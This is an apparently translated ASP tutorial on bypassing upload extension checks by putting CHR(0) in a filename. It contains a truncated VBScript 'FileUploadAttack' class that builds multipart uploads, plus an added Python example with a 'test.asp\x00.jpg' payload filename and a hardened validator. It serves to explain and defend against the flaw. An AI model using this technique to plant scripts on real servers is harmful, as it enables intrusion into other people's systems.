ASP upload vulnerability: using CHR(0) to bypass extension-check scripts
Published: 2023-08-01 13:22:17 Category: ASP tutorials Source:
Today Demon brought up this problem, and it reminded me of an article I had read earlier, "Automatic file upload using IE+ADO without user interaction - VBSscript". That article gives an example of a local script that uploads a file automatically with no user interaction, which is exactly what I could borrow today. The original script relied on the InternetExplorer.Application component; I rewrote it to do the same job with WinHttp.WinHttpRequest.5.1. For more on that component, see the "WinHttpRequest Object Reference".

The code is as follows:

```vbscript
Option Explicit

Function file_get_contents(filename)
    Dim fso, f
    Set fso = WSH.CreateObject("Scripting.FilesystemObject")
    Set f = fso.OpenTextFile(filename, 1)
    file_get_contents = f.ReadAll
    f.Close
    Set f = Nothing
    Set fso = Nothing
End Function

' Code adapted from http://www.motobit.com/tips/detpg_uploadvbsie/
Class FileUploadAttack
    Private m_objWinHttp
    Private m_strUrl
    Private m_strFieldName

    Private Sub Class_Initialize()
        Set m_objWinHttp = WSH.CreateObject( _
            "WinHttp.WinHttpRequest.5.1")
    End Sub

    Private Sub Class_Terminate()
        Set m_objWinHttp = Nothing
    End Sub

    Public Sub setUrl(url)
        m_strUrl = url
    End Sub

    Public Sub setFieldName(name)
        m_strFieldName = name
    End Sub

    ' Information in the form field header.
    Function mpFields(FieldName, FileName, ContentType)
        Dim MPTemplate ' template for the multipart header
        MPTemplate = "Content-Disposition: form-data; name=""{field}"";" + _
            " filename=""{file}""" + vbCrLf + _
            "Content-Type: {ct}" + vbCrLf + vbCrLf
        Dim Out
        Out = Replace(MPTemplate, "{field}", FieldName)
        Out = Replace(Out, "{file}", FileName)
        mpFields = Replace(Out, "{ct}", ContentType)
    End Function

    ' Converts an OLE string to a multibyte string
    Function StringToMB(S)
        Dim I, B
        For I = 1 To Len(S)
            B = B & ChrB(Asc(Mid(S, I, 1)))
        Next
        StringToMB = B
    End Function

    ' Build the multipart/form-data document from file contents and header info
    Function BuildFormData(FileContents, Boundary, _
        FileName, FieldName)
        Dim FormData, Pre, Po
        Const ContentType = "application/upload"
        ' The two parts around the file contents in the multipart form data.
        Pre = "--" + Boundary + vbCrLf + mpFields(FieldName, _
            FileName, ContentType)
        Po = vbCrLf + "--" + Boundary + "--" + vbCrLf
        ' Build the form data using a recordset binary field
        Const adLongVarBinary = 205
        Dim RS: Set RS = WSH.CreateObject("ADODB.Recordset")
        RS.Fields.Append "b", adLongVarBinary, _
            Len(Pre) + LenB(FileContents) + Len(Po)
        RS.Open
        RS.AddNew
        Dim LenData
        ' Convert the Pre string value to binary data
        LenData = Len(Pre)
        RS("b").AppendChunk (StringToMB(Pre) & ChrB(0))
        Pre = RS("b").GetChunk(LenData)
        RS("b") = ""
        ' Convert the Po string value to binary data
        LenData = Len(Po)
        RS("b").AppendChunk (StringToMB(Po) & ChrB(0))
        Po = RS("b").GetChunk(LenData)
        RS("b") = ""
```

The listing ends here in the source.
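As an added example, not part of the original article, the following Python shows from the server side why a filename carrying CHR(0) slips past a string-based extension check, and what a hardened validator looks like. The multipart part, the allowed-extension set and all function names here are constructed for illustration and are not from the article's script.

```python
import re
import secrets

ALLOWED_EXTS = {".jpg", ".jpeg", ".png", ".gif"}

# Constructed sample: one multipart part in the shape the script above builds.
# The filename carries an embedded NUL so that a string-based extension check
# sees ".jpg" while a NUL-terminated filesystem API would stop at the NUL.
SAMPLE_PART = (
    b'Content-Disposition: form-data; name="file"; filename="test.asp\x00.jpg"\r\n'
    b"Content-Type: application/upload\r\n"
    b"\r\n"
    b"sample file body"
)


def parse_filename(part: bytes) -> str:
    """Return the filename parameter from the part's Content-Disposition header."""
    header, _sep, _body = part.partition(b"\r\n\r\n")
    match = re.search(rb'filename="([^"]*)"', header)
    if not match:
        raise ValueError("no filename in Content-Disposition")
    return match.group(1).decode("latin-1")


def naive_extension_ok(filename: str) -> bool:
    """The check the title's trick defeats: look only at the text after the last dot."""
    dot = filename.rfind(".")
    return dot != -1 and filename[dot:].lower() in ALLOWED_EXTS


def effective_name(filename: str) -> str:
    """What a NUL-terminated filesystem API would actually use as the name."""
    return filename.split("\x00", 1)[0]


def hardened_extension_ok(filename: str) -> bool:
    """Reject control characters (NUL included) and path separators, then check the extension."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in filename):
        return False
    if "/" in filename or "\\" in filename:
        return False
    return naive_extension_ok(filename)


def safe_storage_name(filename: str) -> str:
    """Never store under the client-supplied name: keep only the validated extension."""
    if not hardened_extension_ok(filename):
        raise ValueError("rejected upload filename")
    return secrets.token_hex(8) + filename[filename.rfind("."):].lower()
```

The same control-character test belongs in every layer that sees the name; an ASP check written with `Right()` or `InStrRev()` is exactly the string-based kind that `naive_extension_ok` models.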